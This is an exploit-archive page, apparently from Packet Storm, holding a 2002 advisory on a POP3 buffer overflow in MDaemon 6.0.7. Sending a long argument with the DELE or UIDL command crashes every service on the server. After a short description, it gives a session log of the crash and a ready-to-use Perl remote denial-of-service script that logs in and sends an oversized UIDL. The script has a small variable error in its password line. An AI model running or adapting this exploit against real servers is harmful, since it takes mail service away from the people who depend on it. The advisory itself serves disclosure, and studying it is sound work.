exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mdaemon-dos.txt

mdaemon-dos.txt
Posted Oct 29, 2002
Authored by D4rkGr3y | Site dhgroup.org

A denial of service vulnerability found in Alt-n MDaemon v6.0.7 can allow malicious users to remotely crash this application. This vulnerability, which may also affect earlier MDaemon versions, resides in the method used by MDaemon's POP3 service to process user input that is received with the DELE or UIDL commands.

tags | denial of service
SHA-256 | 07650faab656a8d91cb8ed724f20ad9523b77e5bbbc62b13e94dbfcd3b31d987

mdaemon-dos.txt

Change Mirror Download
######################################################
#Product: MDaemon SMTP/POP/IMAP server #
#Authors: Alt-N Technologies Ltd [www.mdaemon.com] #
#Vulnerable versions: v.6.0.7 and bellow #
#Vulnerability: buffer overflow #
#Bug&exploit by D4rkGr3y [www.dhgroup.org] #
######################################################

#Overview#--------------------------------------------------------------#
From MDaemon's help file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs of
any number of individual users and comes complete with a powerful set
of integrated tools for managing mail accounts and message formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."

#Problem#----------------------------------------------------------------#
Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
sending long arguments (32b and above) with DELE or UIDL commands.
To do this u must have at least mail-account on vulnerable host.
After geting long request from client, all MDaemon's Services will be
closed (smtp, imap, pop, (?)worldclient).
Here the log of attack on local MDaemon POP-server:

+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210
271036.AA3656130MD0012@dark.ru>
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
UIDL 11111111111111111111111111111111

Connection to host lost...

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "[vuln_host]";
$login = "[login]";
$pass = "[pass]";
$port = "110";
$data = "1";
$num = "32";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
or die "Couldn't connect: @!\n";
print $socket "USER $login\n";
print $socket "PASS $user\n";
print $socket "UIDL $buf\n";
close($socket);

#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close